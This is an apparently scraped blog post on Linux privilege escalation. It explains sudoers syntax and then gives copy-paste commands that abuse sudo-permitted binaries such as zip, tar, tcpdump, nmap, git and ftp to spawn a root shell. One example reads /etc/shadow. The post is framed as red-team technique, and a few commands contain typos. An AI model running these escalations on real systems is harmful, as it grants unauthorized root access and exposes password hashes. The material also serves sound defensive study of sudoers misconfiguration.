zoukankan      html  css  js  c++  java
  • Abusing SUDO Advance for Linux Privilege Escalation

    Index

    1. What is SUDO?
    2. Scenario.
    3. Sudoer FIle Syntax.
    4. Exploiting SUDO
      • zip
      • tar
      • strace
      • tcpdump
      • nmap
      • scp
      • except
      • nano & pico
      • git
      • ftp/gdb

    What is SUDO ??

    The SUDO(Substitute User and Do) command, allows users to delegate privileges resources proceeding activity logging. In other words, users can execute command under root ( or other users) using their own passwords instead of root’s one or without password depending upon sudoers setting The rules considering the decision making about granting an access, we can find in /etc/sudoers file.


    Scenario.

    During Red Teaming, sometime we encounter some situation where in we need to escalate our privilege to root or other users. an attacker can take advantage of sudo permission to execute a shell.


    Sudoer File Syntax.

    root ALL=(ALL) ALL

    Explain 1: The root user can execute from ALL terminals, acting as ALL (any) users, and run ALL (any) command.

    The first part is the user, the second is the terminal from where the user can use the sudocommand, the third part is which users he may act as, and the last one is which commands he may run when using.sudo

    touhid ALL= /sbin/poweroff
    

    Explain 2: The above command, makes the user touhid can from any terminal, run the command power off using touhid’s user password.

    touhid ALL = (root) NOPASSWD: /usr/bin/find

    Explain 3:  The above command, make the user touhid can from any terminal, run the command find as root user without password.


    Exploiting SUDO Users.

    To Exploiting sudo user u need to find which command u have to allow.
    sudo -l

    The above command shows which command have allowed to the current user.

    Here sudo -l, Shows the user has all this binary allowed to do as on root user without password.

    Let’s take a look at all binary one by one (which is mention in the index only) and Escalate Privilege to root user.


    Using zip command

    $ sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"

    Using tar command

    $ sudo tar cf /dev/null testfile --checkpoint=1 --checkpointaction=exec=/bin/bash

    Using strace command

    $ sudo strace -o/dev/null /bin/bash

    Using tcpdump command

    $ echo $’id
    cat /etc/shadow’ > /tmp/.shell
    $ chmod +x /tmp/.shell
    $ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell-Z root

    Using nmap command

    $ echo "os.execute('/bin/sh')" > /tmp/shell.nse 
    $ sudo nmap --script=/tmp/shell.nse

    Using scp command

    $ sudo scp -S /path/yourscript x y

    Using except command

    $ sudo except spawn sh then sh

    Using nano command

    $ sudo nano -S /bin/bash

    type your command and hit CTRL+T 

    Using git command

    $ sudo git help status

    type:  !/bin/bash

    Using gdb/ftp command

    $ sudo ftp

    type :  !/bin/sh

  • 相关阅读:
    python中__init__和__call__的区别
    scrapy在start_requests中传入参数给parser
    crawl: error: Unrecognized output format 'json''
    判断一个点是否在多边形区域内部 / 判断一个给定位置是否位于某个城市内部
    scrapy爬取页面不完全的解决办法
    module 'tensorflow._api.v2.train' has no attribute 'rmspropoptimizer'
    tf.image.resize处理后的图片无法使用plt.imshow正常显示
    如何将tensor大于某个值为1,小于某个值为0
    Blas GEMV launch failed: m=3, n=10000
    sql 批量插入 insert
  • 原文地址:https://www.cnblogs.com/hack404/p/11288454.html
Copyright © 2011-2022 走看看